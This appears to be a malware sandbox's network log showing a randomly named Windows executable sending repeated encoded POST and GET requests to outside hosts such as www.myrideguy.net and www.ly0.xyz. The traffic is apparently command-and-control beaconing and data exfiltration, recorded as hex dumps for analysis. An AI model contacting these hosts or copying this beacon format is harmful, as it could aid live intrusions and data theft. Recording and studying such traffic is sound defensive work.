Oct 11, 2024 10:02:53.744210958 CEST	705	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:02:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fmc6lsHA2KjzXLXGS7bpusdCkkBJrmV0UT4wiMo3Xeabw66sSxgJiH%2F0l%2BLQh7g%2FncmrJTnxFLmvLCPrhxINAvYQjkvgDuTkJ1iZqYBcnxUBveFQMKcr5oT2%2BaKzGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d549ace838cee-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Oct 11, 2024 10:02:53.744275093 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.11.20	49854	172.67.220.57	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:55.821353912 CEST	535	OUT	GET /vshw/?ATk=EspU2mytRZKz4auAzU3Q1p3hOp6U+fvbelDltaue1VIW4sYIVCILykrSg5ScN2hRjv7eCPLeVYxJkFe87LUrJKeKTtCcyXc83om833z/vTsR6D13pLQ0NOo=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.ly0.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:02:56.350677967 CEST	755	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:02:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=49GSMFidGQGXH4M8N6AJ8rh8AgMko1h3umVhTjVzkny7t5qkc7n4P9quHVHwqy27DqNpo38M4YNkVJnoUsT2bj9AscfpLZKwW3ZX6gHuNT61j%2BNNsrYTHj1cv2lL8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8d0d54ab2b05431f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Oct 11, 2024 10:02:56.350691080 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.11.20	49855	68.66.226.116	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:01.672523022 CEST	798	OUT	POST /kgyd/ HTTP/1.1 Host: www.myrideguy.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.myrideguy.net Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.myrideguy.net/kgyd/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 62 73 66 6e 49 34 4c 52 45 52 53 6d 70 49 56 38 56 6b 47 64 6f 54 4b 49 2b 59 4a 75 4d 34 50 59 42 30 4c 79 67 2b 4e 73 2b 2b 68 4f 36 57 45 44 35 39 6b 4e 49 67 55 4d 33 62 7a 6c 41 42 6d 68 69 74 50 69 65 6d 4c 54 38 6f 52 34 34 34 78 53 62 42 76 75 53 58 43 78 6b 69 32 52 75 31 59 2b 53 72 37 62 6e 4f 69 71 70 66 70 6a 43 6e 65 50 79 64 31 74 49 4b 64 58 58 6c 73 78 65 34 38 66 2b 7a 57 38 6d 70 4e 70 62 4b 39 69 6e 39 48 4a 34 2f 4b 73 48 41 2b 66 64 37 71 39 65 37 6b 65 73 70 31 33 65 72 74 7a 79 58 56 64 6e 6a 57 79 54 44 34 6a 64 6a 73 5a 30 57 35 6a 56 34 5a 4b 53 51 3d 3d Data Ascii: ATk=bsfnI4LRERSmpIV8VkGdoTKI+YJuM4PYB0Lyg+Ns++hO6WED59kNIgUM3bzlABmhitPiemLT8oR444xSbBvuSXCxki2Ru1Y+Sr7bnOiqpfpjCnePyd1tIKdXXlsxe48f+zW8mpNpbK9in9HJ4/KsHA+fd7q9e7kesp13ertzyXVdnjWyTD4jdjsZ0W5jV4ZKSQ==
Oct 11, 2024 10:03:02.658530951 CEST	1289	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-dns-prefetch-control: on set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Fri, 08-Nov-2024 08:03:01 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict x-litespeed-tag: b37_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache cache-control: no-cache, no-store, must-revalidate, max-age=0 transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 11 Oct 2024 08:03:02 GMT server: LiteSpeed strict-transport-security: max-age=63072000; includeSubDomains x-frame-options: SAMEORIGIN x-content-type-options: nosniff Data Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 [TRUNCATED] Data Ascii: 459f}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s\|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l\|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=2&~\'1/aQ3kVi1I-B4Ds
Oct 11, 2024 10:03:02.658545971 CEST	1289	IN	Data Raw: 8b ca b9 95 73 fe 31 88 d1 71 90 f8 2e e4 33 72 43 83 24 5a c6 9f c2 d9 6f 2a 6f 9f d8 10 fb f4 07 57 8d 15 64 1a 14 c1 53 86 ce a6 9f a9 4b de 25 53 04 ff 81 60 51 88 87 20 5d 97 08 3d e4 35 d0 ce a6 e8 e7 80 b9 e7 8c 44 11 3a f0 02 d0 a3 84 79 Data Ascii: s1q.3rC$Zo*oWdSK%S`Q ]=5D:y23qB)KxR3ThtYihBv_^P/jRr>IV-L#VZA-1ej&wIj`{Gk#F;h`
Oct 11, 2024 10:03:02.658559084 CEST	1289	IN	Data Raw: 2c 99 f5 19 0f b1 73 8d 87 e4 39 c5 5b 24 f1 84 32 7e 4e d1 ae 6c 6b 63 32 0e 3d 1c 13 30 ba 71 e5 94 a0 7a 8a 54 28 37 d3 e3 53 7b d2 0f e2 38 18 f7 8c cc be c4 41 d8 33 76 d6 9a 3d 80 5b 14 ba 65 81 b7 91 59 a2 5c 1b 59 33 29 f6 4c 4a 63 26 a5 Data Ascii: ,s9[$2~Nlkc2=0qzT(7S{8A3v=[eY\Y3)LJc&9*9\,C1-aXjxfi%DD14g]'bh5<2\|"fPCG)OKWW$f5vg0Wu:KWW:7wu_GMDFdgLoXt.`z
Oct 11, 2024 10:03:02.658571005 CEST	1289	IN	Data Raw: ac 58 76 c7 98 c5 b3 05 52 9c e5 22 59 75 cb e0 a2 2a 95 04 88 ef ce c2 c3 a4 9f e8 7d 12 4f 08 f1 67 ca 15 72 ef eb 91 c3 8d 1f c4 d1 65 9b 93 e9 8c c5 d8 71 3c 1a f6 60 63 7a d3 0c 6f 6b ca 9f 2d 9e a5 87 38 1e f5 28 b8 2d 36 9b c6 c6 d6 4e e6 Data Ascii: XvR"Yu*}Ogreq<`czok-8(-6NoX<I2T,K<qgdt<;+Qe}&+')tEtMQ0\|1;koppq=r7#0{+F$B>,)XP$$XZKE
Oct 11, 2024 10:03:02.658581972 CEST	1289	IN	Data Raw: d5 5e 00 d2 30 2a 85 95 e7 37 21 bf 5e 51 f9 1c a2 65 f4 b2 1a ce 03 69 1b 3d 64 d7 ed ce 02 90 8e d1 43 cd ba d1 aa 00 19 61 37 98 c0 21 a5 38 61 d8 eb 21 08 0c 84 3f dd f0 16 f1 69 b5 51 43 e9 ff eb 56 59 c8 59 69 97 90 b0 87 4c 0b 3c ac f0 57 Data Ascii: ^0*7!^Qei=dCa7!8a!?iQCVYYiL<W(W:aJUeRN#5bqptZXa0-./$2hjLg=-Psg"qb..voK;3I5d;aOnrX`3gH)K\0
Oct 11, 2024 10:03:02.658607006 CEST	1289	IN	Data Raw: e7 51 2c ad 42 60 55 7b 3a ef 80 ce e3 18 7c 08 a5 95 c7 1a f5 fc ce 53 b2 57 81 be 4a c7 96 1f eb 79 9c 9e 2d c7 5f 35 07 aa 3a ed f3 28 3e 2a 31 56 ce e7 ca e7 74 1e 45 76 16 dd 5c 9a d9 69 9d 27 a0 97 a1 5a a4 83 70 3e e7 69 d4 0d 30 cd 1b a7 Data Ascii: Q,B`U{:\|SWJy-_5:(>1VtEv\i'Zp>i0qGhh<NUUJYH%CRyl'\ze^1Y8#Xri]3bf1E<GK-C9'`9yNw?$Ru--kaQa!V=Up"aojUq
Oct 11, 2024 10:03:02.658607960 CEST	1289	IN	Data Raw: 9b 23 9b e8 f5 83 47 40 97 46 f1 f6 0d f1 dd 80 41 d6 2c cb 99 6e 0b 95 79 8d fe 86 5e 83 de bc 46 5b 55 1d 4c 34 b9 e4 33 93 87 2a 81 bb 34 3f d2 7a 77 da 3f 60 a9 06 4b de e8 db 36 f7 99 61 27 a6 37 34 9e a6 16 bf ca e0 2b 55 f8 b6 fd 3d fa c6 Data Ascii: #G@FA,ny^F[UL434?zw?`K6a'74+U=+Qvq+nmE>,A^wY+*Jq0)RdVe]"2pZF}?HyLGqi7qb}=}v/p?^G?tHo6Ze.i~`e1
Oct 11, 2024 10:03:02.658742905 CEST	1289	IN	Data Raw: 35 c4 5b 02 9e ef db d5 78 6b 68 7b 6f 60 8f 01 dd ee 6a 0d 0d 4d 77 b5 76 bd a9 65 6c 98 2d c9 86 09 e9 db 65 68 73 31 30 b0 b6 f7 66 5b 34 9b 58 f8 57 f6 e7 65 4d 82 90 86 b8 4b 61 1c b8 d8 d3 cd 52 e3 70 74 3a 9f 04 08 00 68 94 5d 0d 9c 9e a4 Data Ascii: 5[xkh{o`jMwvel-ehs10f[4XWeMKaRpt:h]N#<!B4ULpv5'uDuenWo yl<aWMC {ADL+R4Bs-R Ab.LA8hFxQ0)CF"jFkv9b=Lf
Oct 11, 2024 10:03:02.658765078 CEST	1289	IN	Data Raw: 06 e7 e9 c3 08 57 96 7d 02 19 0c 82 e0 c1 8d 52 28 f3 60 29 f0 bf b2 a0 b8 87 90 9d 2d b8 27 a7 dc 0f e2 20 75 5b ad c7 45 65 e1 bd 99 56 c8 7b cc 72 ce c8 38 8c a7 6b 1a aa 25 65 39 47 61 86 41 dc e2 76 1b eb e2 15 20 11 e8 a7 41 e0 32 0b fc e1 Data Ascii: W}R(`)-' u[EeV{r8k%e9GaAv A2/AI#D#q f;!p6xu%XEo[Dc8,Lgyfd-lYD!#1eCi7bS/\ aj{f{d-Uxrs93<)("9
Oct 11, 2024 10:03:02.658776045 CEST	1289	IN	Data Raw: 38 07 bc 47 1d 06 fe 80 0e 45 b6 c0 22 fa e2 17 e6 a5 89 96 05 d2 80 5f cd c3 0d eb 58 fc 5d 10 8c 48 92 dd 59 7c a7 7d 3a cd 94 1d 3b 45 63 59 82 11 90 da 7e 48 3f 07 49 4c 22 95 8f b4 a0 23 fe 8d e2 80 a5 45 6f cc 14 ac b9 0c 8c ff db 87 08 d2 Data Ascii: 8GE"_X]HY\|}:;EcY~H?IL"#EoRp0DU6=-*dit6tl~"nn4'Fh:P'"&~RtfhY=Fe^SOoM:IB>"(Qj\m<
Oct 11, 2024 10:03:02.808487892 CEST	1289	IN	Data Raw: 95 f2 80 e1 1f ca f2 ff 44 a9 20 a3 31 85 e6 34 4e 7c 97 f2 4e f7 09 5e 8c dd b0 8c 4b c2 18 8d 03 c5 b6 1e 7c 54 ca 25 3e a1 32 47 f6 95 83 c4 1b 62 55 27 0f 8e 95 3c 76 cd 6b 68 1c e3 28 90 10 27 2a 44 e2 bb 12 f1 07 a9 97 87 78 dc 0f 5c 05 f1 Data Ascii: D 14N\|N^K\|T%>2GbU'<vkh('Dx\GXt<+~UJb?O\ew(tH\|?g&}:9B#,TIdF1?<Pxl>)E`WAt0)Y0@~8NG?P? ?(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.11.20	49856	68.66.226.116	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:04.361696959 CEST	818	OUT	POST /kgyd/ HTTP/1.1 Host: www.myrideguy.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.myrideguy.net Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.myrideguy.net/kgyd/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 62 73 66 6e 49 34 4c 52 45 52 53 6d 76 70 46 38 58 44 53 64 68 54 4b 4a 39 59 4a 75 46 59 50 63 42 30 48 79 67 2b 6b 68 2b 4d 31 4f 39 33 30 44 34 38 6b 4e 50 67 55 4d 34 37 79 74 66 52 6d 71 69 74 54 41 65 69 4c 54 38 6f 46 34 34 34 42 53 62 77 76 74 54 48 43 33 38 53 32 66 71 31 59 2b 53 72 37 62 6e 4f 65 54 70 66 68 6a 43 33 75 50 7a 38 31 73 4f 36 64 55 64 46 73 78 61 34 38 62 2b 7a 57 65 6d 72 6f 30 62 49 56 69 6e 35 44 4a 37 72 65 6a 51 51 2b 5a 53 62 72 73 66 72 67 51 67 74 4e 2f 4f 4c 4a 6a 2f 31 35 41 76 56 48 6f 4f 78 4d 48 65 77 77 72 77 6d 41 4c 58 36 59 52 50 59 76 56 4b 6f 42 30 63 71 4a 4c 7a 64 75 48 61 62 35 36 68 61 55 3d Data Ascii: ATk=bsfnI4LRERSmvpF8XDSdhTKJ9YJuFYPcB0Hyg+kh+M1O930D48kNPgUM47ytfRmqitTAeiLT8oF444BSbwvtTHC38S2fq1Y+Sr7bnOeTpfhjC3uPz81sO6dUdFsxa48b+zWemro0bIVin5DJ7rejQQ+ZSbrsfrgQgtN/OLJj/15AvVHoOxMHewwrwmALX6YRPYvVKoB0cqJLzduHab56haU=
Oct 11, 2024 10:03:05.334484100 CEST	1289	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-dns-prefetch-control: on set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Fri, 08-Nov-2024 08:03:04 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict x-litespeed-tag: b37_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache cache-control: no-cache, no-store, must-revalidate, max-age=0 transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 11 Oct 2024 08:03:05 GMT server: LiteSpeed strict-transport-security: max-age=63072000; includeSubDomains x-frame-options: SAMEORIGIN x-content-type-options: nosniff Data Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 24 ea e2 d8 ad ed 5c 37 76 e2 c6 4e f6 d9 6d f6 f8 40 24 24 21 a6 48 2e 48 5a 56 dc fc f7 f7 0c 40 12 20 45 5d 2c db fb b4 bb 6d 12 11 18 cc 0c 06 83 01 30 18 00 2f fe f2 f2 e3 f1 c5 2f 67 af d0 38 99 f8 07 4f 5f c0 3f c8 a3 6c 5f f3 13 a6 21 1f 07 a3 7d 8d 04 fa e7 73 0d 45 8c 0c e9 cd be 16 8e fa 68 9c 24 51 dc df dd 0d 47 51 73 42 76 83 f8 99 06 a5 09 f6 0e 9e 3e 79 31 21 09 46 ee 18 b3 98 24 fb da e7 8b d7 7a 57 43 bb 45 4e 80 27 64 5f bb a6 64 1a 85 2c d1 90 1b 06 09 09 92 7d 6d 4a bd 64 bc ef 91 6b ea 12 9d 7f 34 10 0d 68 42 b1 af c7 2e f6 c9 be c9 f1 3c 7d f2 e4 c5 5f 74 1d 1d fa 3e a2 01 fa 18 10 74 fe ea 23 6a 35 3b 4d 03 e9 08 d3 30 26 61 d3 0d 27 48 d7 0f fe 1f 40 27 34 f1 c9 c1 8b 5d f1 2f a4 28 9c b0 70 10 26 b1 c2 47 10 d2 c0 23 37 82 e7 12 e8 88 04 84 e1 24 64 0a 74 85 8b ed c3 77 1f cf 5f 7d dc 11 ec e4 38 62 97 d1 28 41 c9 2c 22 fb 1a 8e 22 9f ba 38 a1 61 b0 eb 7b 7f fb 16 [TRUNCATED] Data Ascii: 459f}kw?e^$\7vNm@$$!H.HZV@ E],m0//g8O_?l_!}sEh$QGQsBv>y1!F$zWCEN'd_d,}mJdk4hB.<}_t>t#j5;M0&a'H@'4]/(p&G#7$dtw_}8b(A,""8a{\&cwL&XOnpb7~ XV#sY:8LfzdI^fg/L+LHh@LVcK()T^dZ@nu)hhls
Oct 11, 2024 10:03:05.334508896 CEST	1289	IN	Data Raw: 15 8b ca b9 55 70 fe 21 4c d0 eb 30 0d 3c c8 67 e4 9a 86 69 bc 8a 3f 85 b3 df 54 de 3e b2 11 0e e8 77 ae 1a 6b c8 34 2c 83 67 0c 9d ce 3e 51 8f bc 49 67 08 fe 03 c1 a2 08 8f 40 ba 1e 11 7a c8 6b a0 9d ce d0 cf 21 f3 ce 18 89 63 74 e4 87 a0 47 29 Data Ascii: Up!L0<gi?T>wk4,g>QIg@zk!ctG)_eg28x2>VPF)gfPbGCzFRs@r&VKAVhQUJjo?<})p#Fm@>}1?XQ$932
Oct 11, 2024 10:03:05.334525108 CEST	1289	IN	Data Raw: a3 f0 3b 4f 66 73 c6 23 ec 5e e1 11 79 4c f1 96 49 3c a0 8c 1f 53 b4 6b db da 84 4c 22 1f 27 04 8c 6e 52 3b 25 a8 9f 22 95 ca cd f5 f8 cc 9e 0c c2 24 09 27 7d 23 b7 2f 49 18 f5 8d bd 8d 66 0f e0 16 85 6e 59 e2 6d 6c 56 28 37 c6 d6 5c 8a 3d 97 d2 Data Ascii: ;Ofs#^yLI<SkL"'nR;%"$'}#/IfnYmlV(7\=Ki8UvH5&e2NcO,z l@14gSMr9<1x[{y9H$JkVn!tpY^eQ7nK(.MhZv~?s
Oct 11, 2024 10:03:05.334537029 CEST	1289	IN	Data Raw: dd 81 15 cb ee 04 b3 64 be 40 86 b3 5a 24 af 6e 15 5c 54 a5 96 00 09 bc 79 78 98 f4 13 7d 40 92 29 21 c1 5c b9 52 ee 8f 66 ec 72 e3 07 71 74 f9 e6 64 36 63 31 f6 5c 9f 46 7d d8 98 de 36 a3 9b 86 f2 67 87 67 e9 11 4e c6 7d 0a 6e 8b ed b6 b1 b5 b3 Data Ascii: d@Z$n\Tyx}@)!\Rfrqtd6c1\F}6ggN}n;$:,z->@-;27hg:>&zlTYj{]Sa{j_rNZ8lpyj\>4l\G]H0\|@L#_E!cJ^,mW([Q,-V"
Oct 11, 2024 10:03:05.334551096 CEST	1289	IN	Data Raw: e9 2c 01 69 19 b5 c2 2a f2 db 90 df ac a9 7c 01 e1 18 fd bc 86 8b 40 3a 46 1f d9 4d bb bb 04 a4 6b f4 51 bb 69 38 35 20 63 ec 85 53 38 a4 94 a4 0c fb 7d 04 81 81 f0 a7 17 dd 20 3e ad 36 1a 28 fb 7f d3 aa 0a 39 2f ed 11 12 f5 91 69 81 87 15 fe 6a Data Ascii: ,i*\|@:FMkQi85 cS8} >6(9/ij5[Jc"IBYW.9!(4E\F%4{]&fm@BT5{6+X7hgg!Ro:J+HUl sdl~;cs<#:pLYR%f'q
Oct 11, 2024 10:03:05.334563971 CEST	1289	IN	Data Raw: ee c5 d2 3a 04 d6 b5 a7 8b 0e e8 dc 8f c1 bb 50 5a 7b ac 51 cf ef 3c 24 7b 35 e8 eb 74 6c f5 b1 9e fb e9 d9 6a fc 75 73 a0 ba d3 3e f7 e2 a3 16 63 ed 7c ae 7a 4e e7 5e 64 e7 d1 2d a4 99 9f d6 79 00 7a 39 aa 65 3a 08 e7 73 1e 46 dd 00 d3 a2 71 9a Data Ascii: :PZ{Q<${5tljus>c\|zN^d-yz9e:sFqFQZTr$=qv%E3iz5,?9s/f^c*YpaY\|?9+p/+pC"u"-5oeo0[%wG(blf!Nl-PZ<I
Oct 11, 2024 10:03:05.334575891 CEST	1289	IN	Data Raw: 37 47 b6 d1 f3 3b 8f 80 1e 8d 93 dd 6b 12 78 21 83 ac 79 96 73 dd 16 2a f3 1c fd 0d 3d 07 bd 79 8e 76 ea 3a 98 68 72 c9 67 2e 0f 55 02 b7 59 7e ac f5 6f b5 7f c0 52 0d 96 bc f1 d7 5d ee 33 c3 6e 42 af 69 32 cb 2c 7e 9d c1 57 aa f0 75 f7 5b fc 95 Data Ascii: 7G;kx!ys=yv:hrg.UY~oR]3nBi2,~Wu[WR<c=w;'RFy~WT`3RZB,U.KAu^&>a[)0E52_rc]??xlj0\Xg~/f.
Oct 11, 2024 10:03:05.334588051 CEST	1289	IN	Data Raw: 0d f1 96 80 e7 fb f6 35 de 1a da c1 0b d8 63 40 37 fb 5a 4b 43 b3 7d ad d3 6c 6b 39 1b a6 23 d9 30 21 7d b7 0a 6d 2e 07 06 d6 0e 5e ec 8a 66 13 0b ff da fe bc aa 49 10 d2 10 77 29 4c 42 0f fb ba 59 69 1c 8e 4e e7 93 00 01 00 8d b2 af 81 d3 93 34 Data Ascii: 5c@7ZKC}lk9#0!}m.^fIw)LBYiN4i'"VWbN)Nf\97m-I]Y(itSpI~0}T)\ySHgXSP#,E"OLGU+!z]{XCdSFN
Oct 11, 2024 10:03:05.334599972 CEST	1289	IN	Data Raw: 70 6d d9 07 90 c1 30 0c ef dc 28 a5 32 77 96 02 ff 2b 0f 8a bb 0b d9 f9 82 07 72 ca 7d 27 0e 32 b7 d5 66 5c d4 16 3e 98 6b 85 a2 c7 ac e6 8c 4c a2 64 b6 a1 a1 5a 51 96 73 14 e5 18 c4 2d 6e 37 89 2e 5e 01 12 81 7e 1a 04 2e b3 30 18 1d fc 12 a6 8c Data Ascii: pm0(2w+r}'2f\>kLdZQs-n7.^~.04B4F'P/v#n"qXG<`c>:_r-YE"t.8}/xJ9\z!6v2Z/vJa 7L}ap3&:A!b;;
Oct 11, 2024 10:03:05.334611893 CEST	1289	IN	Data Raw: 1c 06 43 3a 12 d9 02 8b e8 8b 9f 99 9f 25 5a 16 48 03 7e b5 8f b7 ac d7 e2 ef 92 60 44 92 ec ce e2 3b eb d3 59 a6 ec d8 19 1a cb 12 8c 80 d4 0e 23 fa 29 4c 13 12 ab 7c 64 05 5d f1 6f 9c 84 2c 2b 7a 6d 66 60 ed 55 60 fc df 01 44 90 16 e4 56 82 83 Data Ascii: C:%ZH~`D;Y#)L\|d]o,+zmf`U`DV#4w'zQmQi%e>AW Vxo_nYG[Vo*$SL7;7/Xsd[[VIc7mp&xwldO;JTzjz(-?h
Oct 11, 2024 10:03:05.484060049 CEST	1289	IN	Data Raw: e5 11 c3 df 95 e5 ff 3b a5 82 8c 26 14 9a d3 78 17 78 94 77 ba 8f f0 62 ec 96 65 5c 10 c6 68 12 2a b6 f5 e8 83 52 2e 0d 08 95 39 b2 af 1c a5 fe 08 ab 3a 79 f4 5a c9 63 57 bc 86 c6 6b 1c 87 12 e2 9d 0a 91 06 9e 44 fc 5e ea e5 31 9e 0c 42 4f 41 7c Data Ascii: ;&xxwbe\hR.9:yZcWkD^1BOA\|\|+C%/JQr`3(E*esDn!&:>Q/8f(~Jq;q%TB=!>F\|0_J?AWNBt7JV0%<uiqK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.11.20	49857	68.66.226.116	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:07.049134970 CEST	2578	OUT	POST /kgyd/ HTTP/1.1 Host: www.myrideguy.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.myrideguy.net Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.myrideguy.net/kgyd/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 62 73 66 6e 49 34 4c 52 45 52 53 6d 76 70 46 38 58 44 53 64 68 54 4b 4a 39 59 4a 75 46 59 50 63 42 30 48 79 67 2b 6b 68 2b 4d 74 4f 39 46 38 44 36 66 4d 4e 4f 67 55 4d 78 62 79 75 66 52 6d 4e 69 74 4c 45 65 69 47 75 38 72 39 34 34 62 4a 53 66 79 48 74 5a 48 43 33 31 79 32 53 75 31 59 72 53 72 71 54 6e 4f 75 54 70 66 68 6a 43 31 6d 50 36 4e 31 73 4d 36 64 58 58 6c 74 2b 65 34 